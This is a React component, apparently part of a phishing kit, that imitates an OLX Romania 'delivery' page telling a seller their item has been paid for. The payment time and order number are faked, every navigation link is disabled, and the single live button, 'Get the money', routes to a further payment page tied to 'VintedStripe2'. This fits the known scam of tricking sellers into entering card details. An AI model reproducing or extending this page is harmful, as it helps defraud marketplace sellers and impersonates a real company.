import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './OlxRoSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/olx-logo.png`;

const DELIVERY_FEE = '13,90';
const FOOTER_COL1 = [
  'Aplicații mobile',
  'Ajutor și contact',
  'Anunțuri promovate',
  'OLX marketplace',
  'Condiții de utilizare',
  'Politica de confidențialitate',
];
const FOOTER_COL2 = [
  'Recompense Vânzător',
  'Recompense Cumpărător',
  'Cum să te ferești de phishing',
  'Politica privind cookie-urile',
  'Setări Cookies',
];
const FOOTER_COL3 = ['Cariere în OLX', 'Cum funcționează?', 'Harta site', 'Livrare prin OLX'];

function noop(e) {
  e.preventDefault();
}

function orderDisplayId(pageCode, pageData) {
  const raw = (pageCode || pageData?.page_code || '').trim();
  if (!raw) return '—';
  let h = 0;
  for (let i = 0; i < raw.length; i += 1) h = (h * 31 + raw.charCodeAt(i)) >>> 0;
  return String(100000 + (h % 899999));
}

function paidTodayLine() {
  const d = new Date();
  const t = d.toLocaleTimeString('ro-RO', { hour: '2-digit', minute: '2-digit' });
  return `Plătit astăzi la ${t}`;
}

function IconMessage() {
  return (
    <svg className="olxro-nav-ic" width="20" height="20" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M4 6h16v10H8l-4 4V6z"
        stroke="currentColor"
        strokeWidth="1.8"
        strokeLinejoin="round"
      />
    </svg>
  );
}

function IconHeart() {
  return (
    <svg className="olxro-nav-ic" width="20" height="20" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 20S5 14.5 5 9.5C5 7 7 5 9.5 5c1.5 0 3 1 3.5 2.5C13.5 6 15 5 16.5 5 19 5 21 7 21 9.5 21 14.5 12 20 12 20z"
        stroke="currentColor"
        strokeWidth="1.8"
        strokeLinejoin="round"
      />
    </svg>
  );
}

function IconUser() {
  return (
    <svg className="olxro-nav-ic" width="20" height="20" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="12" cy="9" r="3.5" stroke="currentColor" strokeWidth="1.8" />
      <path d="M6 20c0-3.5 3-6 6-6s6 2.5 6 6" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" />
    </svg>
  );
}

function IconTruck() {
  return (
    <svg className="olxro-cta-ic" width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M2 8h12v8H2V8zm12 2h3l3 3v3h-6v-6z"
        stroke="currentColor"
        strokeWidth="1.6"
        strokeLinejoin="round"
      />
      <circle cx="7" cy="18" r="2" fill="currentColor" />
      <circle cx="17" cy="18" r="2" fill="currentColor" />
    </svg>
  );
}

function IconShield() {
  return (
    <svg className="olxro-notice-ic" width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path d="M12 3l8 4v6c0 5-3.5 9-8 10-4.5-1-8-5-8-10V7l8-4z" fill="#1e88e5" opacity="0.9" />
      <path d="M9 12l2 2 4-4" stroke="#fff" strokeWidth="1.8" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function MapSnippet({ address }) {
  return (
    <div
      className="olxro-map-snippet"
      style={{
        marginTop: 14,
        height: 120,
        borderRadius: 4,
        background: 'linear-gradient(160deg, #e3f2fd 0%, #90caf9 40%, #64b5f6 100%)',
        position: 'relative',
        overflow: 'hidden',
      }}
    >
      <div
        style={{
          position: 'absolute',
          left: '50%',
          top: '50%',
          transform: 'translate(-50%, -55%) rotate(-45deg)',
          width: 28,
          height: 28,
          borderRadius: '50% 50% 50% 0',
          background: '#1565c0',
          border: '3px solid #fff',
          boxShadow: '0 2px 8px rgba(0,0,0,0.2)',
        }}
      />
      <p
        style={{
          position: 'absolute',
          bottom: 8,
          left: 10,
          right: 10,
          margin: 0,
          fontSize: 12,
          color: '#002f34',
          fontWeight: 500,
          lineHeight: 1.3,
        }}
      >
        📍 {address}
      </p>
    </div>
  );
}

/**
 * OLX România — Livrare prin OLX, CTA → index2 (VintedStripe2).
 */
function OlxRoSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'RO').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'RON';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceMain =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);
  const amountPaid = priceMain === '—' ? `— ${sym}` : `${priceMain} ${sym}`;

  const productName = (pageData?.product_name || '').trim() || '—';
  const buyerName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const deliveryAddr = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = (pageData?.photo_url || '').trim();
  const orderId = useMemo(() => orderDisplayId(pageCode || '', pageData), [pageCode, pageData]);
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="olxro-wrap" lang="ro">
        <div className="olxro-loading">Se încarcă…</div>
        <div className="olxro-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="olxro-wrap" lang="ro">
      <header className="olxro-header">
        <div className="olxro-header-inner">
          <a href="#/" className="olxro-logo-link" onClick={noop} aria-label="OLX">
            <img src={LOGO_SRC} alt="OLX" className="olxro-logo" />
          </a>
          <nav className="olxro-nav" aria-label="Principal">
            <a href="#/" className="olxro-nav-item" onClick={noop}>
              <IconMessage />
              Mesaje
            </a>
            <a href="#/" className="olxro-nav-item" onClick={noop} aria-label="Favorite">
              <IconHeart />
            </a>
            <a href="#/" className="olxro-nav-item" onClick={noop}>
              <IconUser />
              Contul tău
            </a>
            <a href="#/" className="olxro-nav-item olxro-btn-post" onClick={noop}>
              Adaugă un anunț nou
            </a>
          </nav>
        </div>
      </header>

      <div className="olxro-main">
        <div className="olxro-grid">
          <div className="olxro-product-col">
            <div className="olxro-card-top">
              <div className="olxro-card-top-meta">
                <span className="olxro-paid-today">{paidTodayLine()}</span>
              </div>
              <button type="button" className="olxro-fav-btn" onClick={noop} aria-label="Favorite">
                <IconHeart />
              </button>
            </div>
            <div className="olxro-order-hero">
              <span className="olxro-order-id">{orderId}</span>
              <span className="olxro-order-price">{amountPaid}</span>
            </div>
            <div className="olxro-product-body">
              <div className={`olxro-product-img-wrap${photoUrl ? '' : ' olxro-product-img--ph'}`}>
                {photoUrl ? <img src={photoUrl} alt="" className="olxro-product-img" /> : null}
              </div>
              <h2 className="olxro-product-title">{productName}</h2>

              <div className="olxro-buyer-block">
                <p className="olxro-buyer-section-title">INFORMAȚII DESPRE CUMPĂRĂTOR</p>
                <p className="olxro-buyer-label">Numele destinatarului</p>
                <p className="olxro-buyer-value">{buyerName}</p>
                <p className="olxro-buyer-label">Adresa destinatarului</p>
                <p className="olxro-buyer-value">{deliveryAddr}</p>
                <a href="#/" className="olxro-report" onClick={noop}>
                  <span aria-hidden>🚩</span> Raportează
                </a>
              </div>
            </div>
          </div>

          <aside className="olxro-sidebar">
            <h3 className="olxro-sidebar-h">LIVRARE PRIN OLX</h3>
            <div className="olxro-paid-big">
              <div className="olxro-paid-label">PLĂTIT</div>
              <div className="olxro-paid-amount">{amountPaid}</div>
            </div>
            <div className="olxro-fee-row">
              <span className="olxro-fee-label">LIVRARE DE LA</span>
              <span>{DELIVERY_FEE} lei</span>
            </div>
            <div className="olxro-fee-row">
              <span className="olxro-fee-label">PACHET DE PROTECȚIE</span>
              <span>0,00 lei</span>
            </div>

            <Link to={index2Path} className="olxro-cta">
              <IconTruck />
              Obțineți banii
            </Link>

            <div className="olxro-notice">
              <IconShield />
              <div>
                <p className="olxro-notice-title">Primiți fonduri în siguranță</p>
                <p className="olxro-notice-text">Articolul dvs. a fost deja plătit de către cumpărător.</p>
              </div>
            </div>

            <div className="olxro-meta">
              <div className="olxro-meta-row">
                <span className="olxro-meta-k">LIVRARE</span>
                <span className="olxro-meta-v">FAN Courier</span>
              </div>
              <div className="olxro-meta-row">
                <span className="olxro-meta-k">MODALITATE DE PLATĂ</span>
                <span className="olxro-meta-v">Card bancar</span>
              </div>
            </div>

            <a href="#/" className="olxro-more" onClick={noop}>
              Află mai mult despre Livrarea prin OLX
            </a>

            <div>
              <p className="olxro-sidebar-h" style={{ marginTop: 20, marginBottom: 8 }}>
                LOCAȚIA CUMPĂRĂTORULUI
              </p>
              <MapSnippet address={deliveryAddr} />
            </div>
          </aside>
        </div>
      </div>

      <footer className="olxro-footer">
        <div className="olxro-footer-inner">
          <div>
            {FOOTER_COL1.map((t) => (
              <a key={t} href="#/" onClick={noop}>
                {t}
              </a>
            ))}
          </div>
          <div>
            {FOOTER_COL2.map((t) => (
              <a key={t} href="#/" onClick={noop}>
                {t}
              </a>
            ))}
          </div>
          <div>
            {FOOTER_COL3.map((t) => (
              <a key={t} href="#/" onClick={noop}>
                {t}
              </a>
            ))}
          </div>
          <p className="olxro-footer-apps">Descarcă aplicația pentru telefonul tău — Google Play / App Store</p>
        </div>
      </footer>

      <div className="olxro-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default OlxRoSuccess;
